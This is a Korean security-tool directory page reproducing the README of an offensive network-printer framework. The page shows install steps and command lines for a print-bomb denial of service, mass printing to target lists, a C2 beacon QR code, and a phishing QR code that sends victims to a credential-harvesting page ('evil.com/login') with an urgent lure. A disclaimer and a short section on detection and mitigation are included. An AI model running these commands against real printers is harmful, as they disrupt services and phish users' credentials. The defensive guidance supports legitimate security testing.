Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39047 — 프린터 보안 테스트를 위한 익스플로잇 프레임워크로, 원시 포트 9100을 통해 PCL 페이로드 전달, DoS 폭탄 공격, C2 QR 코드, 피싱 QR 코드, 그리고 은밀한 데이터 유출 마커 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/azhariramadhan/cve-2026-39047
ReconnaissanceExploitationData ExfiltrationNetwork SecurityPenetration TestingSocial EngineeringRed Teaming
GitHubazhariramadhan/cve-2026-39047

CVE-2026-39047

프린터 보안 테스트를 위한 익스플로잇 프레임워크로, 원시 포트 9100을 통해 PCL 페이로드 전달, DoS 폭탄 공격, C2 QR 코드, 피싱 QR 코드, 그리고 은밀한 데이터 유출 마커 기능을 제공합니다.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PrintHack - 프린터 보안 테스트 도구

root@kitploit:~
  ____  _        _      _____       _   _ ___ 
 |  _ \| |      | |    |  __ \     | \ | |  _|
 | |_) | |  __  | | __ | |__) | __ |  \| | |  _
 |  _ <| | / _| | |/ / |  ___/ ' \| . ` | | (_)
 | |_) | | \_|  |   <  | |   | (_) | |\  | |___ |
 |____/|_|  \__  |_|\_\|_|    \___/|_| \_|_____|
       _   _  | |
      | | | | | |
      | |_| | | |
       \___/  |_|
       ______
      |______|
      |      |
      |______|

🖨️ printerBOMB - 프린터 스풀링 공격 프레임워크

간과된 공격 벡터 악용: 네트워크 프린터

개발자: Azhari Ramadhan 🔥


📋 개요

PrintHack은 보안 전문가, 레드 팀, 침투 테스터를 위해 설계된 정교한 프린터 악용 도구입니다. 이 도구는 원시 프린터 스풀링 프로토콜(포트 9100)을 활용하여 보안 평가, 프린터 취약점 테스트, 실제 공격 시나리오 시뮬레이션을 수행합니다.

⚠️ 면책 조항: 이 도구는 합법적인 보안 테스트 및 교육 목적으로만 사용됩니다. 소유한 시스템 또는 명시적 테스트 승인을 받은 시스템에서만 책임감 있게 사용하십시오.


🎯 기능

핵심 기능

  • 🔌 원시 소켓 인쇄 - 포트 9100을 통한 프린터 직접 통신
  • 📄 PCL 페이로드 전달 - 프린터 명령 언어(Printer Command Language) 페이로드 전송
  • 🖼️ 이미지 유출 마커 - 은닉 채널용 ASCII 아트로 이미지 인쇄
  • 💣 프린트 폭탄 (DoS) - 프린터 내구성 테스트를 위한 대량 페이로드 전송
  • 🎯 대량 인쇄 - 여러 프린터 동시 타겟팅
  • 🔴 레드 팀 작전 - C2 콜백 마커, 피싱 QR 코드, 유출 마커

공격 벡터


🚀 빠른 시작

설치

root@kitploit:~
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt

요구 사항

  • Python 3.6+
  • Pillow - 이미지 처리
  • qrcode - QR 코드 생성
  • requests - HTTP 요청
root@kitploit:~
pip install Pillow qrcode requests

🛠️ 사용법

기본 작업

root@kitploit:~
# 프린터 연결 테스트
python3 printerhack.py -t 192.168.1.100 --check

# 테스트 페이지 전송
python3 printerhack.py -t 192.168.1.100 --test

# 사용자 정의 메시지 인쇄
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"

고급 작업

root@kitploit:~
# URL에서 이미지 인쇄 (ASCII로 변환)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png

# PCL 페이로드 전송
python3 printerhack.py -t 192.168.1.100 --pcl

# 프린트 폭탄 (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10

# C2 콜백 QR 코드 인쇄
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"

# 피싱 QR 코드 인쇄
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"

대량 인쇄

root@kitploit:~
# 파일에서 여러 프린터로 인쇄
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"

🎖️ 레드 팀 사용 사례

1. 물리적 접근 시뮬레이션

물리적 접근 시나리오에서 손상된 프린터에 은밀한 메시지나 지침을 인쇄합니다.

2. 사회 공학

보안 공지로 위장한 자격 증명 수집 페이지로 연결되는 QR 코드를 인쇄합니다.

3. 데이터 유출

인코딩된 데이터의 은밀한 유출 채널로 프린터 출력을 사용합니다.

4. DoS 테스트

프린터 기반 서비스 거부 공격에 대한 조직의 복원력을 테스트합니다.

5. 네트워크 정찰

네트워크 전체에서 프린터를 열거하고 식별합니다.


🔒 탐지 및 완화

블루 팀용

탐지 지표:

  • 포트 9100의 비정상적인 트래픽
  • 대규모 예상치 못한 인쇄 작업
  • QR 코드 또는 바코드가 포함된 인쇄 작업
  • 반복되는 실패한 인쇄 시도

완화 전략:

  • 프린터 인증 구현 (IPP Everywhere, SMB 서명)
  • 비정상적인 작업에 대한 프린터 로그 모니터링
  • 별도 VLAN에 프린터 분리
  • 프린터 보안 어플라이언스 배포
  • 인쇄 인프라에 대한 정기적인 보안 평가

📜 법적 면책 조항

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.

ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.

Developed by: Azhari Ramadhan

🤝 기여

기여를 환영합니다! 다음 사항을 준수해 주세요:

  • 코드는 Python PEP 8 표준을 따릅니다
  • 모든 새 기능에는 테스트가 포함됩니다
  • 보안 중심 풀 리퀘스트가 우선 처리됩니다

📧 연락처

개발자: Azhari Ramadhan 🔥


📄 라이선스

MIT 라이선스 - 자세한 내용은 LICENSE 참조


🖨️ printerBOMB - 마지막 방어선 악용

공격자처럼 생각하여 공격자보다 앞서 나가세요

Azhari Ramadhan이 🔥로 제작

도구 다운로드
기능설명
--check프린터 연결 테스트
--test테스트 페이지 전송
--message사용자 정의 페이로드 인쇄
--imageURL에서 이미지 인쇄 (ASCII 아트)
--pclPCL 형식 페이로드 전송
--bombDoS 공격 (대량 페이로드)
--c2C2 콜백 QR 코드 인쇄
--phish피싱 QR 코드 인쇄
--exfil데이터 유출 마커 인쇄
--file여러 대상에 대량 인쇄